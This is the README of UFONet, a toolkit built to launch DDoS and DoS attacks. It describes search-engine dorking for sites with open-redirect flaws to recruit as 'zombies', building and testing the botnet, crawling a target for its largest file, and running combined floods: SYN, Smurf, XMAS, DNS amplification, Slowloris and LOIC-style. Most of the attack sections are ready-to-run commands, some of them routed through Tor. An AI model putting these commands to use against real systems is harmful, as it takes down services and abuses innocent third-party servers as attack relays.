README.txt 15 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523
  1. ===========================================================================
  2. 888 888 8888888888 .d88888b. 888b 888 888
  3. 888 888 888 d88PY888b 8888b 888 888
  4. 888 888 888 888 888 88888b 888 888
  5. 888 888 8888888 888 888 888Y88b 888 .d88b. 888888
  6. 888 888 888 888 888 888 Y88b888 d8P Y8b 888
  7. 888 888 888 888 888 888 Y88888 88888888 888
  8. Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
  9. 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
  10. ===========================================================================
  11. Welcome to UFONet [ DDoS+DoS ] Botnet/C&C/Darknet ;-)
  12. ===========================================================================
  13. ###############################
  14. # Project info
  15. ###############################
  16. - Website:
  17. https://ufonet.03c8.net
  18. - IRC:
  19. irc.freenode.net - #ufonet
  20. ###############################
  21. # FAQ
  22. ###############################
  23. https://ufonet.03c8.net/FAQ.html
  24. ###############################
  25. # Summary
  26. ###############################
  27. UFONet - is a toolkit designed to launch DDoS and DoS attacks.
  28. See these links for more info:
  29. - CWE-601:Open Redirect:
  30. https://cwe.mitre.org/data/definitions/601.html
  31. - OWASP:URL Redirector Abuse:
  32. https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2
  33. ###############################
  34. # Installing
  35. ###############################
  36. UFONet runs on many platforms. It requires Python (>=3) and the following libraries:
  37. python3-pycurl - Python bindings to libcurl (Python 3)
  38. python3-geoip - Python3 bindings for the GeoIP IP-to-country resolver library
  39. python3-whois - Python module for retrieving WHOIS information - Python 3
  40. python3-crypto - cryptographic algorithms and protocols for Python 3
  41. python3-requests - elegant and simple HTTP library for Python3, built for human beings
  42. python3-scapy - Packet crafting/sniffing/manipulation/visualization security tool
  43. You can automatically get all required libraries using:
  44. sudo python setup.py install
  45. For manual installation on Debian-based systems (ex: Ubuntu), run:
  46. sudo apt-get install python3-pycurl python3-geoip python3-whois python3-crypto python3-requests python3-scapy
  47. On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
  48. pip install GeoIP
  49. pip install python-geoip
  50. pip install pygeoip
  51. pip install requests
  52. pip install pycrypto
  53. pip install pycurl
  54. pip install whois
  55. pip install scapy-python3
  56. Source libs:
  57. * Python: https://www.python.org/downloads/
  58. * PyCurl: http://pycurl.sourceforge.net/
  59. * GeoIP: https://pypi.python.org/pypi/GeoIP/
  60. * Python-geoip: https://pypi.org/project/python-geoip/
  61. * Pygeoip: https://pypi.org/project/pygeoip/
  62. * Whois: https://pypi.python.org/pypi/whois
  63. * PyCrypto: https://pypi.python.org/pypi/pycrypto
  64. * PyRequests: https://pypi.python.org/pypi/requests
  65. * Scapy-Python3: https://pypi.org/project/scapy-python3/
  66. * Leaflet: http://leafletjs.com/ (provided)
  67. ###############################
  68. # Searching for 'zombies'
  69. ###############################
  70. UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites.
  71. A common query string should be like this:
  72. 'proxy.php?url='
  73. 'check.cgi?url='
  74. 'checklink?uri='
  75. 'validator?uri='
  76. For example, you can begin a search with:
  77. ./ufonet -s 'proxy.php?url='
  78. Or providing a list of "dorks" from a file:
  79. ./ufonet --sd 'botnet/dorks.txt'
  80. By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:
  81. ./ufonet -s 'proxy.php?url=' --se 'bing'
  82. This is the list of available search engines with last time that they were working:
  83. - duckduckgo [01/02/2020: OK!]
  84. - bing [01/02/2020: OK!]
  85. - yahoo [01/02/2020: OK!]
  86. You can also search massively using all search engines supported:
  87. ./ufonet -s 'proxy.php?url=' --sa
  88. To control how many 'zombies' recieved from the search engines reports you can use:
  89. ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20
  90. Or you can make the tool to search for the maximun number of results automatically (this may take time!):
  91. ./ufonet --auto-search
  92. At the end of the process, you will be asked if you want to check the list retrieved to see
  93. if the urls are vulnerable.
  94. Do you want to check if the NEW possible zombies are valid? (Y/n)
  95. After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
  96. Do you want to update your army? (Y/n)
  97. If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt
  98. -------------
  99. Examples:
  100. + with verbose: ./ufonet -s 'proxy.php?url=' -v
  101. + with threads: ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100
  102. ###############################
  103. # Testing botnet
  104. ###############################
  105. UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks.
  106. For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'.
  107. Remember that urls of the 'zombies' should be like this:
  108. http://target.com/check?uri=
  109. After that, launch:
  110. ./ufonet -t 'botnet/zombies.txt'
  111. You can test for XML-RPC Pingback vulnerability related 'zombies', with:
  112. ./ufonet --test-rpc
  113. To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:
  114. ./ufonet --test-all
  115. And to check if your 'zombies' are still online run:
  116. ./ufonet --test-offline
  117. Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:
  118. ./ufonet --attack-me
  119. At the end of the process, you will be asked if you want to check the list retrieved to see
  120. if the urls are vulnerable.
  121. Do you want to check if the NEW possible zombies are valid? (Y/n)
  122. After that, you will be asked to update the list adding automatically only the 'vulnerable' web apps.
  123. Do you want to update your army? (Y/n)
  124. If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.
  125. -------------
  126. Examples:
  127. + with verbose: ./ufonet -t 'botnet/zombies.txt' -v
  128. + with proxy TOR: ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
  129. + with threads: ./ufonet -t 'botnet/zombies.txt' --threads 50
  130. + test whole botnet: ./ufonet --test-all
  131. + test XML-RPCs: ./ufonet --test-rpc
  132. + search for offlines: ./ufonet --test-offline
  133. + attack yourself: ./ufonet --attack-me
  134. ###############################
  135. # Inspecting a target
  136. ###############################
  137. UFONet can search for biggest file on your target by crawlering it:
  138. ./ufonet -i http://target.com
  139. You can use this before to attack to be more effective.
  140. ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"
  141. -------------
  142. Example:
  143. +input:
  144. ./ufonet -i http://target.com
  145. +output:
  146. [...]
  147. +Image found: images/wizard.jpg
  148. (Size: 63798 Bytes)
  149. ------------
  150. +Style (.css) found: fonts.css
  151. (Size: 20448 Bytes)
  152. ------------
  153. +Webpage (.php) found: contact.php
  154. (Size: 2483 Bytes)
  155. ------------
  156. +Webpage (.php) found: about.php
  157. (Size: 1945 Bytes)
  158. ------------
  159. +Webpage (.php) found: license.php
  160. (Size: 1996 Bytes)
  161. ------------
  162. ================================================================================
  163. =Biggest File: http://target.com/images/wizard.jpg
  164. ================================================================================
  165. -------------
  166. ###############################
  167. # Abducting a target
  168. ###############################
  169. UFONet can provide you some interesting information about your target:
  170. ./ufonet -x http://target.com
  171. -------------
  172. Example:
  173. +input:
  174. ./ufonet -x https://yahoo.com
  175. +output:
  176. [...]
  177. -Target URL: https://yahoo.com
  178. -IP : 206.190.39.42
  179. -IPv6 : OFF
  180. -Port : 443
  181. -Domain: yahoo.com
  182. -Bytes in : 550.09 KB
  183. -Load time: 9.10 seconds
  184. -Banner: ATS
  185. -Vía : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer),
  186. http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ])
  187. -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)
  188. -Reports:
  189. + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
  190. + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660
  191. [...]
  192. ---------
  193. [Info] Abduction finished... ;-)
  194. -------------
  195. ###############################
  196. # Attacking a target
  197. ###############################
  198. UFONet can attack your target in many different ways.
  199. For example, enter a target to attack with a number of rounds:
  200. ./ufonet -a http://target.com -r 10
  201. On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that
  202. if you have a list of 1.000 'zombies' it will launch 1.000 'zombies' x 10 rounds = 10.000 requests to the target.
  203. If you don't put any round it will apply only 1 by default.
  204. Additionally, you can choose a place to recharge on target's site. For example, a large image,
  205. a big size file or a flash movie. In some scenarios where targets doesn't use cache systems
  206. this will make the attack more effective.
  207. ./ufonet -a http://target.com -b "/images/big_size_image.jpg"
  208. -------------
  209. Examples:
  210. + with verbose: ./ufonet -a http://target.com -r 10 -v
  211. + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  212. + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
  213. + with threads: ./ufonet -a http://target.com -r 10 --threads 500
  214. ###############################
  215. # Special attacks
  216. ###############################
  217. UFONet uses different ways to exploit 'Open Redirect' vulnerabilities.
  218. You can use UFONet to stress database on target by requesting random valid strings as search queries:
  219. ./ufonet -a http://target.com --db "search.php?q="
  220. Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
  221. processing required by target.
  222. You can test your list of 'XML-RPCs zombies' launching:
  223. ./ufonet --test-rpc
  224. At same time, you can connect LOIC (with proxy support), to make a determinate number of recursive requests
  225. directly to your target:
  226. ./ufonet -a http://target.com --loic 100
  227. You can connect LORIS to make requests leave open threads on the target too, making the web server
  228. work slower:
  229. ./ufonet -a http://target.com --loris 100
  230. And you can connect UFOSYN (it requires 'root' access) to start a powerful TCP/SYN flood attack:
  231. sudo python ufonet -a http://target.com --ufosyn 100
  232. Or make a SPRAY ('root' required) attack to launch a Distributed 'Reflection' Denial of Service (DrDoS):
  233. sudo python ufonet -a http://target.com --spray 100
  234. A SMURF ('root' required) attack to send Distributed ICMP 'Broadcast' packets:
  235. sudo python ufonet -a http://target.com --smurf 101
  236. Or a XMAS ('root' required) attack that will flood your target with 'Christmas Tree' packets
  237. sudo python ufonet -a http://target.com --xmas 101
  238. A STARVATION attack ('root' required) that will knock down your target in seconds, if it does not have a
  239. minimum level of protection:
  240. sudo python ufonet -a http://target.com --nuke 10000
  241. Or a TACHYON ('root' required) attack to perform a distributed amplification of DNS traffic:
  242. sudo python ufonet -a http://target.com --tachyon 1000
  243. All ways could be combined, so UFONet can attack DDoS and DoS, at the same time:
  244. python ufonet -a http://target.com --loic 100 --loris 100
  245. sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101 --nuke 10000 --tachyon 1000
  246. ###############################
  247. # Updating
  248. ###############################
  249. UFONet has implemented an option to update the tool to the latest stable version.
  250. This feature can be used only if you have cloned it from a git respository.
  251. To check your version you should launch:
  252. ./ufonet --update
  253. This will update the tool automatically removing all files from old package.
  254. ###############################
  255. # Generating a 'Blackhole'
  256. ###############################
  257. UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
  258. * Setup web server with a folder "ufonet", this folder should be:
  259. - located in /var/www/ufonet (default debian/ubuntu install)
  260. - owned by the user running the blackhole
  261. - accessible with http://your-ip/ufonet/
  262. * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)
  263. * Anyone wanting to connect to your server needs to set the --up-to/--down-from
  264. to the ip address of your webserver...
  265. [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.
  266. To start a new 'blackhole' launch:
  267. ./ufonet --blackhole
  268. ###############################
  269. # GUI/Web Interface
  270. ###############################
  271. You can manage UFONet using a Web Interface. The tool has implemented a python web server
  272. connected to the core providing you a more user friendly experience.
  273. To launch it use:
  274. ./ufonet --gui
  275. This will open a tab on your default browser with all features of the tool and some 'extra' options:
  276. - NEWS: Allows to read last "news" published by a "mothership"
  277. - MISSIONS: Allows to read last "missions" published by a "mothership"
  278. - SHIP STATS: Allows to review statistics from your "spaceship"
  279. - RANKING: Allows to check your "ranking" position
  280. - BOARD: Allows to send/receive messages to/from a "mothership" (a forum)
  281. - WARPS: Allows to interact with a "mothership" to download/upload "zombies"
  282. - GLOBAL GRID: Allows to review statistics from other "spaceships"
  283. - WARGAMES: Allows to propose and join some real "wargames"
  284. ###############################
  285. # Timelog
  286. ###############################
  287. --------------------------
  288. 01.02.2020 : v.1.4
  289. --------------------------
  290. --------------------------
  291. 10.03.2019 : v.1.3
  292. --------------------------
  293. --------------------------
  294. 03.02.2019 : v.1.2.1
  295. --------------------------
  296. --------------------------
  297. 31.12.2018 : v.1.2
  298. --------------------------
  299. --------------------------
  300. 26.09.2018 : v.1.1
  301. --------------------------
  302. --------------------------
  303. 08.03.2018 : v.1.0
  304. --------------------------
  305. --------------------------
  306. 14.07.2017 : v.0.9
  307. --------------------------
  308. --------------------------
  309. 21.10.2016 : v.0.8
  310. --------------------------
  311. --------------------------
  312. 17.08.2016 : v.0.7
  313. --------------------------
  314. --------------------------
  315. 05.11.2015 : v.0.6
  316. --------------------------
  317. --------------------------
  318. 24.05.2015 : v.0.5b
  319. --------------------------
  320. --------------------------
  321. 15.12.2014 : v.0.4b
  322. --------------------------
  323. --------------------------
  324. 27.09.2014 : v.0.3.1b
  325. --------------------------
  326. --------------------------
  327. 20.09.2014 : v.0.3b
  328. --------------------------
  329. --------------------------
  330. 22.06.2013 : v.0.2b
  331. --------------------------
  332. --------------------------
  333. 18.06.2013 : v.0.1b
  334. --------------------------
  335. ###############################
  336. # Thanks to
  337. ###############################
  338. - UFo & Mandingo & Ikujam
  339. - Phineas Fisher ;-)
  340. - The Shadow Brokers (TSB) ;_)
  341. - World Wide Antifas >-)
  342. -------------------------
  343. ############